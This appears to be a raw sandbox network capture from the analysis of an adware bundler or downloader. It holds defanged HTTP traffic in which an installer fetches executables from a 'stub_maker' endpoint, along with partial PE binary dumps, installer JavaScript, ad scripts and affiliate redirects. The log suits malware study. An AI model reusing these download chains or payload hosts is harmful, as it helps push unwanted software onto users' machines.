User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Setup__21223_il2.exe"

Content-Type: application/x-msdownload

Date: Wed, 07 Jun 2017 01:14:55 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Last-Modified: Wed, 07 Jun 2017 01:14:55 GMT

Pragma: no-cache

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: Setup__21223_il2.exe

Content-Length: 750080

Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....P#X
.....................r.......P............@.......................... 
................ ..............................0..`....p..^...........
.........................................`..*...................c;....
...........................text...L...........................`.0`.dat
a...............................@.0..rdata............................
..@.`@.bss................................@.`..pdata..................
............@.`@.xdata..............................@.`@.idata..`....0
......................@.`..CRT.........@......................@.`@.tls
....,....`......................@.0..rsrc...`....p...0................
..@.`./1...................*..............@.`@/5...................<
;..............@.`@/7...................N..............@.`@/17........
..........`..............@.`@.........................................
.......................................................RE.5..D.R..h..G
...H!..D.R..h..G...H!..D.R..h..G...H!..D.H!..t.....h..G.R..D.H!..!...Y
..H.5../.RE-St.H!..D?t.5....H!...........8t..(t.t..E.Y.Y..j.jE....D..t
.u..Q.Y... ....'./.H!)t.Q...D."t..Q...t..H!...Q/..D.tt....u..Q....5...
.H!t....u....u.u..u......'.^_.Y.O.'........V..UW.u..t....}...u...s..^.
j...$.....]^_..Y.'.u...r........r...t.u[..t..... ..r.....t..r.u[....'.
r.usA.."j.....M......U.G.U.V.].u..Wu....U-..'.u]O^_t....}...u...s..^.j
...$.........'.u...r.Y...u...r.'...........u... ..r........r.u[3t.
<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive

HTTP/1.1 403 Forbidden

Content-Type: application/xml

Transfer-Encoding: chunked

Connection: keep-alive

Date: Wed, 07 Jun 2017 01:14:37 GMT

Server: AmazonS3

Age: 13

X-Cache: Error from cloudfront

Via: 1.1 4d1cbe225c5d30aa78ec9a6fa1ba4211.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gQ3b3k_W4XQY5rIZvQe_luCIHWcaQlvk_net_K-QdaW7zhyCdC57cA==
f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code
>AccessDenied</Code><Message>Access Denied</Message&
gt;<RequestId>16BEF359AC4774DF</RequestId><HostId>OA
h0Ih//pzuS9lhyZbo6OTiP8F7WRjqSXcUU8Zh1ZWyb4Ug9QMz4 7WLqOcPT/qxZZ7VIpuI
o8E=</HostId></Error>..0..HTTP/1.1 403 Forbidden..Content-
Type: application/xml..Transfer-Encoding: chunked..Connection: keep-al
ive..Date: Wed, 07 Jun 2017 01:14:37 GMT..Server: AmazonS3..Age: 13..X
-Cache: Error from cloudfront..Via: 1.1 4d1cbe225c5d30aa78ec9a6fa1ba42
11.cloudfront.net (CloudFront)..X-Amz-Cf-Id: gQ3b3k_W4XQY5rIZvQe_luCIH
WcaQlvk_net_K-QdaW7zhyCdC57cA==..f3..<?xml version="1.0" encoding="
UTF-8"?>.<Error><Code>AccessDenied</Code><Mess
age>Access Denied</Message><RequestId>16BEF359AC4774DF&
lt;/RequestId><HostId>OAh0Ih//pzuS9lhyZbo6OTiP8F7WRjqSXcUU8Zh
1ZWyb4Ug9QMz4 7WLqOcPT/qxZZ7VIpuIo8E=</HostId></Error>..0.
.

GET /V39/amipb.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn1.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 72270

Connection: keep-alive

Date: Sun, 28 May 2017 14:44:47 GMT

Last-Modified: Sun, 28 May 2017 14:42:50 GMT

ETag: "27c40225ea9569d953d4898b6aea5350"

Accept-Ranges: bytes

Server: AmazonS3

Age: 37799

X-Cache: Hit from cloudfront

Via: 1.1 22e8ec6be29eb9755e0a8dfac5944c51.cloudfront.net (CloudFront)

X-Amz-Cf-Id: sL-h9ae2S4ChJ_AYkDSaRybVSMW5VQt-WA7PvtqtvM8Vp9B4TtsZgw==
..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();.var
 g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var
 g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = 
[];..var g_disable_updater = true;..//in the version we tests updater 
task is created firstly.var g_UpdaterTestVersion = (typeof (g_ver) !==
 'undefined' && g_ver != null && g_ver == '1.1.5.90');.var g_UpdaterTa
skCreated = false;..function LogMessage(message) {.    try {.        g
_ami.Log(message);.    }.    catch (excpt) {.    }.}..function IsDecli
ned(name) {.    var declined = 0;.    for (var i = 0; i < g_removed
Comps.length; i  ) {.        if (g_removedComps[i] == name) {.        
    declined = 1;.            break;.        }.    }.    return declin
ed;.}..function UpdateSkipStatus(sn) {.    if (g_testa && !ArrayContai
ns(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayConta
ins(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {.        if (g_t
esta.constructor != Array || ArrayContains(g_testa, sn)) {.           
 g_ami.WriteProfileString(g_testf, '', sn, 'S');.            g_reporte
dComps.push(sn);.        }.    }.}..function ShortNameFromName(name) {
.    for (c = 0; c < g_comps.length; c  ) {.        if (g_comps[c].
name == name) {.            return g_comps[c].sn;.        }.    }.    
return name;.}..function UpdateComponentsStatus() {.    LogMessage('Up
dateComponentsStatus function started');.    for (var j = 0; j < g_
possibleComps.length; j  ) {..        if (g_possibleComps[j].sn ==
<<< skipped >>>

GET /stub_maker_uk2.php?url=hXXp://tragony.info/taveara?q=Installation HTTP/1.0

Host: birth.babieshistory.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 72254

Connection: close

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="593687e92906d_ua.exe"

X-Powered-By: ASP.NET

Date: Tue, 06 Jun 2017 10:46:01 GMT

Age: 52120

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

X-Amz-Cf-Id: wDNqFbrTanZ2eYeOQtoVf69D_ndz6GeFhwNfQ-MGEG93oZwUK7mgGQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46
%*46,R.6&*46,R.64*46%*56.*46>..6 *46>..6$*46>..6$*46Rich%*46.
.......PE..L.....GO.................p....>..B...8............@.....
......................G...........@.................................4.
.......0G.......................?.H...................................
.................................................text....o.......p....
.............. ..`.rdata..b*.......,...t..............@..@.data....f&g
t;.........................@....ndata....... ?........................
..rsrc........0G.....................@..@.reloc...2...@G..4...........
.......@..B...........................................................
......................................................................
......................................................................
......................................................................
...........................................................U....\.}..t
 .}.F.E.u..H.........H.P.u..u..u.....@..K...SV.5....W.E.P.u.....@..e..
.E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E
...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@
..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E
......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..~.W....@..u.W
...u....E.P.u.....@._^3.[.....L$........i. @...T.....tUVW.q.3.;5....sD
..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5....r
<<< skipped >>>

GET / HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: google.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Referrer-Policy: no-referrer

Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=mVM3Wdr1CMXR8gf1_ppA

Content-Length: 260

Date: Wed, 07 Jun 2017 01:15:05 GMT
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=mVM3Wdr1CMXR
8gf1_ppA">here</A>...</BODY></HTML>..HTTP/1.1 302
 Found..Cache-Control: private..Content-Type: text/html; charset=UTF-8
..Referrer-Policy: no-referrer..Location: hXXp://VVV.google.com.ua/?gf
e_rd=cr&ei=mVM3Wdr1CMXR8gf1_ppA..Content-Length: 260..Date: Wed, 07 Ju
n 2017 01:15:05 GMT..<HTML><HEAD><meta http-equiv="cont
ent-type" content="text/html;charset=utf-8">.<TITLE>302 Moved
</TITLE></HEAD><BODY>.<H1>302 Moved</H1>
.The document has moved.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=c
r&ei=mVM3Wdr1CMXR8gf1_ppA">here</A>...</BODY></H
TML>....

GET /js/show_ads_supp.js?pubId=5103 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.1-1ads.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: max-age=600

Content-Type: application/javascript;charset=utf-8

Transfer-Encoding: chunked

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Wed, 07 Jun 2017 01:14:48 GMT

Connection: close
a..............200...;kw..... $v.B.hZN..S2<..$]m.dk'..kk}@...H.JRV.
..{g. .....K?X&..`0.7.;....z}C..f.d.Mr..4.C.{...v..O.N........../.....
..1[..$d7.$]......f...Q.E>n.<Y..iJW.h.Fa.......$....,..B..V.%.Y.
=.qF.<J..-..V...........x.....0.o..q...t~.^..h.....C...aY.9W.......
.C.._~Y...X.....I......71'......7&q....j..p..|..,.....o.i..Lgt...Yk..q
........2q............y...l.....u..q....C3..{...6[..4$d8..`.k.........
44C.4../ .oY..[...1..d....ef.P..2.]..%.....}......._...( {..<...X.I
^....(...Wv.XM.Cj.4..F..Q|kx....Y2....7.<.f.W...s.H.)..A...200...N.
...4.....$......%.A.g...[....OY.I..x.>.....i<O..P....6...<yN.
.D56.'(d.f..x>...L....?.q`....$1.;..S'...`.K..F...m.1....;[.;......
.A....F..Hb....P...e..B.........B/hS..F.f..w $.s.y...,.m .4.H%'.U..j&l
t;...e....G-.0.C...)e...<.Y0..3...g.$.u?..`..hv.....p....p@..Q.,a..
.....Vk.V....b.1..\`.3.3.m.....X^N0R@..L...7...E..D...j...*.7..d.....d
.6.m.. ;....@xm...06..J....4$..jCG.5..i..}.a..14.....A.w.j&.........f.
.t.x=..b3hm3..kd..2.".pv.....p..sy.C......)\.y..E..\...,_x......n.@u..
NM7.....-..o.r.'...z....q.......[a..f..200..@..k(.........7.9.}.0e4..8
......g....f=....."/..8.<0..D.` .C...bM..U8..W.evwJ.5.. 3......SF..
K.....L.U.B.K...|$..=.......5.P._0..W...6*...=...<.!h.E..I.51.$^..@
.Q....jM..x..c.V../".c.1..7xTx.tx...1../....k.0..Y......D.....l......&
lt;.......v@..?l..F.f-d.VG...F..../..S.Jy4....@{.R.....f]k..h.^.@.H.
.F.y.|.._....mK..r..Y..........."T.ke......Wl.........'Xn@...q...Y....
...>.t......9...9...G'.6...|2.P...A..x.BkV.....c...uB...:#....f
<<< skipped >>>

GET /aff_c?offer_id=1199&aff_id=6929&aff_sub=PUBLISHER-ID&aff_sub2=CLICK-ID&aff_sub3=Default3 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tracking.revimedia.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Wed, 07 Jun 2017 01:15:04 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://VVV.traktrafficflow.com/?a_aid=65f4g4dfgsdfb1dfgh&page=m-2-panther&clickid=10200827de76ab08c4097a34ad51ad&pubid=6929&aff_sub=PUBLISHER-ID

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.11.8

Set-Cookie: enc_aff_session_1199=ENC02634-10200827de76ab08c4097a34ad51ad-6929-1199-0-0-0-0-UA-1-_-5055424C49534845522D4944-434C49434B2D4944-44656661756C7433-_-_-194.242.96.226-20170606211504-_-3C2F571A2632223209283A6A070A112D774A14080C390A5462735A0B7C487F6F630A36101F16460365; expires=Thu, 07 Sep 2017 01:15:04 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJJbnRlcm5ldCBFeHBsb3JlciIsIm1vYmlsZV9kZXZpY2VfYnJhbmQiOiJNaWNyb3NvZnQiLCJtb2JpbGVfYnJvd3NlciI6Ik1TSUUiLCJtb2JpbGVfYnJvd3Nlcl92ZXJzaW9uIjoiOS4wIiwibW9iaWxlX2NhcnJpZXIiOiI/IiwidXNlcl9hZ2VudCI6Ik1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKSIsImFjY2VwdF9sYW5ndWFnZSI6ImVuLVVTIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Fri, 01 May 2020 11:55:04 GMT; path=/;

tracking_id: 10200827de76ab08c4097a34ad51ad

X-Robots-Tag: noindex, nofollow

Content-Length: 344

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://VVV.traktrafficflow.com/?a_aid=65f4g4dfgsdfb1dfgh&pag
e=m-2-panther&clickid=10200827de76ab08c4097a34ad51ad&pubid=692
9&aff_sub=PUBLISHER-ID">here</a>.</p>.</body>
</html>...
<<< skipped >>>

GET hXXp://when.legtest.bid/offer.php?affId=2601&trackingId=237110129&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: when.legtest.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 3808

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Wed, 07 Jun 2017 01:13:38 GMT

X-Cache: Miss from cloudfront

Via: 1.1 65715c6e447bfc4ebcfb81f088c7e3f3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 7luEyTGhK8E1--Q5y-6Tin9vXw69UZZFUAWZzI5zwOQO26JC8uRcNg==
.p......mH.^d.....,....Gv...Ah...g<F..z...Fy......HI.G...#..NA.$\.w
..u....H.#.7O.S.....y>2#hs./...Z...........i1....=......L...o....&l
t;..4.z.....zmf.=.....@...v......1Y.......}...7A.c..1..\..%.. .&....9.
.l..c.............L..Bc....e....?..8.;uz:.......("..4.Z8......e@..[..K
.O5.P..Xh......M`&.....&..J.]..F}..vzwt....vx.l....[..u.=..c.."8.....=
{.).. .7.~....62...xb/.p.We.51lX..h.nm...c..e.......Ak..B.N}...l.V.X.^
`j.......G..}%A.\U.b..j..C&g..z.T.u..&....\.M.........Bp|^g.h......"\.
......f...&._Dr.....\....c...'.<l.!#..o.b. ..l.......E.p.ul.N8x....
...R...?.......T2...."..!T.E.@.........y.......@Z..........z........r.
..o........X4.....K..!d....5....4{.GoD.M.......CB.g....-......l...a./.
nIpP..V.O= ...S.FU.?x5KCn{AA...7....yt...nzJ.ae.h\..;>AG..x...Q$o.=
..s..r.C......x.......vN......z.....v..}......` I5`..Ui..Z`.#..=.....-
g....t.#.n....M...pT4.m2.h......rS.......YFOi......c......N..../..].5`
.\%3.,.....E=.../3.w..R.WB...e..K.6.- ....zbA.Q(...."....pa.).yC......
...-]. s..`2.5"C.....9..VH.&..z..kp....R....Bw..)aUw......"..P..60..6.
....f.La...].O.D0......S..1........ ..(P6..H../...%...)..W'.A....%.p@&
gt;...a.I.................g.....|.......-?......M.-T.Kv....<.p#..Y^
..w$...T.a...!...J.n.9..{Z].}.........I$i.A...P......Q^..QI.....ik?..l
.N-.R.d.......N....f...t.&5...5....3.... 1.....A.T..>..{<&5/....
7Kg...ro..0&'B..3..W..ni.C|.......P.@......QSu.v&..../L^..Jt^.....]...
..TJR=.2...g.~*..K...J.Di.y..;.U|..I..N...........n3......^0......~..U
..N....]..F6..]....-......x5C...4..Wc..@..Bw...."7J.M....9...9?..i
<<< skipped >>>

GET /js/show_ads_supp.js?pubId=907 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.1-1ads.com

Connection: Keep-Alive

Cookie: epomUUID=b4aedbf0-4b1e-11e7-bbde-9c8e991fef80; cfc=10001-1496815371060--; ucv=10001-UA-1496884491409-24--

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: max-age=600

Content-Type: application/javascript;charset=utf-8

Transfer-Encoding: chunked

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Wed, 07 Jun 2017 01:15:02 GMT

Connection: close
a..............200...;kw..... $v.B.hZN..S2<..$]m.dk'..kk}@...H.JRV.
..{g. .....K?X&..`0.7.;....z}C..f.d.Mr..4.C.{...v..O.N........../.....
..1[..$d7.$]......f...Q.E>n.<Y..iJW.h.Fa.......$....,..B..V.%.Y.
=.qF.<J..-..V...........x.....0.o..q...t~.^..h.....C...aY.9W.......
.C.._~Y...X.....I......71'......7&q....j..p..|..,.....o.i..Lgt...Yk..q
........2q............y...l.....u..q....C3..{...6[..4$d8..`.k.........
44C.4../ .oY..[...1..d....ef.P..2.]..%.....}......._...( {..<...X.I
^....(...Wv.XM.Cj.4..F..Q|kx....Y2....7.<.f.W...s.H.)..A...200...N.
...4.....$......%.A.g...[....OY.I..x.>.....i<O..P....6...<yN.
.D56.'(d.f..x>...L....?.q`....$1.;..S'...`.K..F...m.1....;[.;......
.A....F..Hb....P...e..B.........B/hS..F.f..w $.s.y...,.m .4.H%'.U..j&l
t;...e....G-.0.C...)e...<.Y0..3...g.$.u?..`..hv.....p....p@..Q.,a..
.....Vk.V....b.1..\`.3.3.m.....X^N0R@..L...7...E..D...j...*.7..d.....d
.6.m.. ;....@xm...06..J....4$..jCG.5..i..}.a..14.....A.w.j&.........f.
.t.x=..b3hm3..kd..2.".pv.....p..sy.C......)\.y..E..\...,_x......n.@u..
NM7.....-..o.r.'...z....q.......[a..f..200..@..k(.........7.9.}.0e4..8
......g....f=....."/..8.<0..D.` .C...bM..U8..W.evwJ.5.. 3......SF..
K.....L.U.B.K...|$..=.......5.P._0..W...6*...=...<.!h.E..I.51.$^..@
.Q....jM..x..c.V../".c.1..7xTx.tx...1../....k.0..Y......D.....l......&
lt;.......v@..?l..F.f-d.VG...F..../..S.Jy4....@{.R.....f]k..h.^.@.H.
.F.y.|.._....mK..r..Y..........."T.ke......Wl.........'Xn@...q...Y....
...>.t......9...9...G'.6...|2.P...A..x.BkV.....c...uB...:#....f
<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 3782

Connection: keep-alive

Date: Sun, 09 Oct 2016 07:51:21 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT

ETag: "f62071084680ed861fa12c3ea47cb6e1"

Accept-Ranges: bytes

Server: AmazonS3

Age: 21749

X-Cache: Hit from cloudfront

Via: 1.1 b8b7a48d4425abc8f20c14956fccf2e5.cloudfront.net (CloudFront)

X-Amz-Cf-Id: lZTtLBM3PvPfSdj39MDvh71CZjtQbQQJLp8rzswJZ3L8ekzxgZef0g==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<...hIDATx..[kl#W....yO......?..u..H..P..J...$@..K...l. .}..}P@@.
.J........q..H@3.E.u@.".Zg7.$..$q..f..\...c;....(W;.].x.~......;....?.
.....c.|X........B...;D...rv&.M..eE...eZ..1Ts5....E?..{O.x....B.. ..=B
...D...~.,,..p.493...XB.R...2&......1...., .5.....b[.B`ae...oF...p.FZ.
,."..zh......p...yH.l>!4:. .[aXi.3.... |.. ..t.....J...../4...(T.me
L..'9ceC.]R//...FkW.Z...vpb6d..?......=.x..M.RO....P..p[c-..K.p.,v....
....K.|.=......:!..2............<`....j....Mq...C<{*L2j.^05g.q=}
qy`..sy ]3.UK.j.....o.Z.......2&u5{.fw.}6.Oe8cuCO._..<.Jd.9.;......
.[4.2.i....y.K.Z.......q..J.A^..g......1..|.lN.)8............f.q]...4.
...........I..c...=.2..[..2LZ.1rIf....3.....M...2.M.f..R siU..i..0....
.9_.?.'...S.R#.sN.{.s.........@7...%..{........w>....A.V...{?..V9.*
G.....,.......lA.:7.........E.q.C..._W.Dd.k;&D..4..E}3.}..X.c.)`.!.$..
.R.........X.<....^.PH..NO.)...^KM-.......:.8...Q..S7.`. ...V...D.@
.'.<..x!..1.PU.ktr<R.@.W.......t....l..'d..n.'|v*...R..=.uau0..u
C...S.......G....F............f...h.XN.h..-(..../....l.f..fI..`G.|....
.\...bf..Q*...p....Y..R......w........\aj.TR..IUA.d.6...@.DqNi..8.#.l!
)l(,V....6m.<...E..../.y....P.......y.........O.f....-.....Y....B.(
.s..r....z<jf....m...[Hc...%5.....$..x.Z...u2.....h.........94{....
.9...\.wE.?....!E.\l..S...).....A...2FV.y..Z..d.HEPsy....!.*X.......?s
|.qM..y..U.s.......m....Zi.T......C....m.nB.......4.....Q.........) ..
.Ph..'.~|..nZ'.Fpk..:....3...)_|.~....H..gnM.J?k....$y......-.....
<<< skipped >>>

GET /pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 1063

Connection: keep-alive

Date: Sat, 03 Jun 2017 01:52:47 GMT

Last-Modified: Wed, 01 Feb 2017 10:47:23 GMT

ETag: "bbdbc45b850d676430e003f6e5059013"

Accept-Ranges: bytes

Server: AmazonS3

Age: 83879

X-Cache: Hit from cloudfront

Via: 1.1 3283735112d0a322451d32ef038129c9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: wLq4QmsYA--ma8o6OScZ34OgCiWdhkoRmAoqvnSjd9-_OEkAc7-avA==
<!doctype html>..<html>...<head lang="en">....<ti
tle>Thank you page</title>....<meta http-equiv="Content-Ty
pe" content="text/html; charset=UTF-8">....<meta name="viewport"
 content="width=device-width, initial-scale=1">....<link rel="st
ylesheet" href="../public/css/style.css">....<script src="../pub
lic/js/functions.js" type="text/javascript"></script>...</
head>...<body>....<div class="wrapper">.....<div cla
ss="header">......<div class="title">.......<div class="ti
tle-caption">Thank you for downloading!</div>......</div&g
t;.....</div>..   ... <div class="content">..        ..<
;div class="inner">..            ..<div class="adnl_zone">.. 
           ...<script type="text/javascript">./*<![CDATA[*/.s
upp_key = "3a71f57f6d976f956c5f61dbdd4adf7b";.supp_time = new Date().g
etTime();.supp_channel = "";.supp_code_format = "ads-sync.js";.supp_cl
ick = "";.supp_custom_params = {};../*]]>*/.</script>.<scr
ipt type='text/javascript' src='//VVV.1-1ads.com/js/show_ads_supp.js?p
ubId=5103'></script>..            ..</div>......</di
v>.....</div>....</div>...</body>..</html>.
.....
<<< skipped >>>

GET /crls/secureca.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT

If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.geotrust.com

HTTP/1.1 200 OK

Server: Apache

ETag: "e51a8920713233a1c892e4a0f986bffe:1496797220"

Last-Modified: Wed, 07 Jun 2017 01:00:20 GMT

Date: Wed, 07 Jun 2017 01:15:05 GMT

Content-Length: 325

Connection: keep-alive

Content-Type: application/pkix-crl
0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equi
fax Secure Certificate Authority..170607004302Z..170617004302Z0,0....%
...020514181157Z0.....3..020515130611Z0...*.H............9.g....~...g.
.)..8..M..V..Q&C.6.......7.Q...-(.pz.CC..y.]"Y.o-&..9.D..k...>...O.
.7...bC.....s..&...c. ...K_......A.la.......Q$F.HTTP/1.1 200 OK..Serve
r: Apache..ETag: "e51a8920713233a1c892e4a0f986bffe:1496797220"..Last-M
odified: Wed, 07 Jun 2017 01:00:20 GMT..Date: Wed, 07 Jun 2017 01:15:0
5 GMT..Content-Length: 325..Connection: keep-alive..Content-Type: appl
ication/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equi
fax1-0 ..U...$Equifax Secure Certificate Authority..170607004302Z..170
617004302Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H.......
.....9.g....~...g..)..8..M..V..Q&C.6.......7.Q...-(.pz.CC..y.]"Y.o-&..
9.D..k...>...O..7...bC.....s..&...c. ...K_......A.la.......Q$F...

GET hXXp://when.legtest.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=201&aff_sub2=320779&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1078188741&url=http://when.legtest.bid/offer.php?affId={aff_id}&trackingId=237110129&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: when.legtest.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8

Content-Length: 643

Connection: close

Location: hXXp://disk.thingunit.bid/aff_c?offer_id=4&aff_id=2601&source=2519&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1280881289&url=http://when.legtest.bid/offer.php?affId={aff_id}&trackingId=237110129&instId=2519&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Wed, 07 Jun 2017 01:13:36 GMT

X-Cache: Miss from cloudfront

Via: 1.1 44d7d28132a47c2b5760c4ec3dd7aa89.cloudfront.net (CloudFront)

X-Amz-Cf-Id: tVanqYx3wpl6HE9T9d6XDi6oxY3xNx3ETjVkGJO8Pka4aZi2BEHQaQ==
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://disk.thingunit.bid/aff_c?offer_id=4&aff_id=2601&
amp;source=2519&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=
LP_DEF&aff_sub5=1280881289&url=http://when.legtest.bid/o
ffer.php?affId={aff_id}&trackingId=237110129&instI
d=2519&ho_trackingid={transaction_id}&cc={cou
ntry_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.
0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid%3
D5c12d1104cca24294ae7d8d45ce8d028&v=3">here</a></body&
gt;..
<<< skipped >>>

GET /80A164/n135-cdn/files135/65/10001/118203/FB_RU_800_Group1A.jpg HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

